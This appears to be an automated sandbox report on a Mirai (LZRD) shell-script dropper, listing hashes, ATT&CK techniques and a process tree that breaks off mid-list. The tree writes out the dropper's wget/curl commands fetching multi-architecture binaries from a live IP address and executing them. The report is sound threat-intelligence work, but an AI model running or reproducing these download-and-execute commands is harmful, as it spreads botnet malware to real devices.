mirai | 1b6a6ceb23e46cf0a36bb0f1fc89472f3ec42ea1b23ca15ffe49c39f8d9ea0f4

Analysis

max time kernel
149s
max time network
153s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
02/12/2024, 00:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

88738a95929e9c44969bcffde3c50f4b
SHA1

5b9581fadd1ea4b8621d5b0adb559a631b1226ee
SHA256

1b6a6ceb23e46cf0a36bb0f1fc89472f3ec42ea1b23ca15ffe49c39f8d9ea0f4
SHA512

df40b12ad937df1d3a36673761fe27b5c2072f1f871f37610e76987411c292f75b70035258ebf6f912d4f856ad014c0d67d461e87e71b939e127179c5bd985f9

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1526	chmod
1542	chmod
1572	chmod
1614	chmod
1622	chmod
1654	chmod
1518	chmod
1534	chmod
1558	chmod
1586	chmod
1606	chmod
1638	chmod
1512	chmod
1646	chmod
1550	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Abyss	1513	Abyss
/tmp/Abyss	1519	Abyss
/tmp/Abyss	1527	Abyss
/tmp/Abyss	1535	Abyss
/tmp/Abyss	1543	Abyss
/tmp/Abyss	1551	Abyss
/tmp/Abyss	1559	Abyss
/tmp/Abyss	1573	Abyss
/tmp/Abyss	1587	Abyss
/tmp/Abyss	1607	Abyss
/tmp/Abyss	1615	Abyss
/tmp/Abyss	1623	Abyss
/tmp/Abyss	1639	Abyss
/tmp/Abyss	1647	Abyss
/tmp/Abyss	1655	Abyss

Modifies Watchdog functionality 1 TTPs 28 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss
File opened for modification	/dev/misc/watchdog	Abyss
File opened for modification	/dev/watchdog	Abyss

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 28 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss
File opened for modification	/sbin/watchdog	Abyss
File opened for modification	/bin/watchdog	Abyss

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-5.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1082/cmdline	Abyss
File opened for reading	/proc/1064/cmdline	Abyss
File opened for reading	/proc/661/cmdline	Abyss
File opened for reading	/proc/1624/cmdline	Abyss
File opened for reading	/proc/1536/cmdline	Abyss
File opened for reading	/proc/1184/cmdline	Abyss
File opened for reading	/proc/1039/cmdline	Abyss
File opened for reading	/proc/1045/cmdline	Abyss
File opened for reading	/proc/1062/cmdline	Abyss
File opened for reading	/proc/1072/cmdline	Abyss
File opened for reading	/proc/429/cmdline	Abyss
File opened for reading	/proc/961/cmdline	Abyss
File opened for reading	/proc/965/cmdline	Abyss
File opened for reading	/proc/1312/cmdline	Abyss
File opened for reading	/proc/1590/cmdline	Abyss
File opened for reading	/proc/707/cmdline	Abyss
File opened for reading	/proc/1192/cmdline	Abyss
File opened for reading	/proc/1118/cmdline	Abyss
File opened for reading	/proc/1316/cmdline	Abyss
File opened for reading	/proc/903/cmdline	Abyss
File opened for reading	/proc/1576/cmdline	Abyss
File opened for reading	/proc/1095/cmdline	Abyss
File opened for reading	/proc/1498/cmdline	Abyss
File opened for reading	/proc/1377/cmdline	Abyss
File opened for reading	/proc/1544/cmdline	Abyss
File opened for reading	/proc/1658/cmdline	Abyss
File opened for reading	/proc/519/cmdline	Abyss
File opened for reading	/proc/542/cmdline	Abyss
File opened for reading	/proc/1068/cmdline	Abyss
File opened for reading	/proc/1339/cmdline	Abyss
File opened for reading	/proc/1256/cmdline	Abyss
File opened for reading	/proc/1118/cmdline	Abyss
File opened for reading	/proc/1538/cmdline	Abyss
File opened for reading	/proc/1095/cmdline	Abyss
File opened for reading	/proc/646/cmdline	Abyss
File opened for reading	/proc/469/cmdline	Abyss
File opened for reading	/proc/680/cmdline	Abyss
File opened for reading	/proc/1158/cmdline	Abyss
File opened for reading	/proc/463/cmdline	Abyss
File opened for reading	/proc/1025/cmdline	Abyss
File opened for reading	/proc/1153/cmdline	Abyss
File opened for reading	/proc/429/cmdline	Abyss
File opened for reading	/proc/1590/cmdline	Abyss
File opened for reading	/proc/1232/cmdline	Abyss
File opened for reading	/proc/1153/cmdline	Abyss
File opened for reading	/proc/557/cmdline	Abyss
File opened for reading	/proc/1538/cmdline	Abyss
File opened for reading	/proc/475/cmdline	Abyss
File opened for reading	/proc/1148/cmdline	Abyss
File opened for reading	/proc/1316/cmdline	Abyss
File opened for reading	/proc/1562/cmdline	Abyss
File opened for reading	/proc/961/cmdline	Abyss
File opened for reading	/proc/1590/cmdline	Abyss
File opened for reading	/proc/1062/cmdline	Abyss
File opened for reading	/proc/518/cmdline	Abyss
File opened for reading	/proc/1498/cmdline	Abyss
File opened for reading	/proc/434/cmdline	Abyss
File opened for reading	/proc/1576/cmdline	Abyss
File opened for reading	/proc/1522/cmdline	Abyss
File opened for reading	/proc/1650/cmdline	Abyss
File opened for reading	/proc/1562/cmdline	Abyss
File opened for reading	/proc/1185/cmdline	Abyss
File opened for reading	/proc/1656/cmdline	Abyss
File opened for reading	/proc/1502/cmdline	Abyss

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1540	curl
1547	wget
1548	curl
1539	wget

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sparc	curl
File opened for modification	/tmp/Abyss	ohshit.sh
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:1504
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:1505
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:1506
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:1510
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  PID:1511
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-rXt1pz systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - File and Directory Permissions Modification
  PID:1512
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  PID:1513
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:1515
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:1516
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  PID:1517
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-rXt1pz systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1518
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1519
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1523
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-rXt1pz systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1527
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:1531
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:1532
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-rXt1pz systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1535
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1539
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1540
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-rXt1pz systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1542
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1543
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:1547
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1548
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-rXt1pz systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1550
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1551
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1555
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1556
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-rXt1pz systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1558
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1559
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:1563
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:1564
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-xykfD6 systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1572
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1573
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:1577
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:1578
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-jehuVu systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1586
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1587
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:1591
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:1592
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-LZGKPP systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1606
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1607
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:1611
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:1612
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-LZGKPP systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1614
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1615
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:1619
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:1620
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-bolt.service-LZGKPP systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1622
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1623
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:1627
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  - Writes file to tmp directory
  PID:1628
- /bin/chmod
  chmod +x Abyss busybox config-err-xTetUE netplan_ey82z6ny ohshit.sh snap-private-tmp ssh-WOxbGU3ZyI9l systemd-private-31394bd183164e30ab7270cefa65c722-colord.service-B0EdJX systemd-private-31394bd183164e30ab7270cefa65c722-ModemManager.service-vDiwMl systemd-private-31394bd183164e30ab7270cefa65c722-systemd-resolved.service-DoImSo systemd-private-31394bd183164e30ab7270cefa65c722-systemd-timedated.service-j3ZHfg ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1638
- /tmp/Abyss
  ./Abyss
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1639
- /usr/bin/wget
  wget http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:1643
- /usr/bin/curl
  curl -O http://207.244.199.132/HideAbyss/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:1644
- /bin/chmod
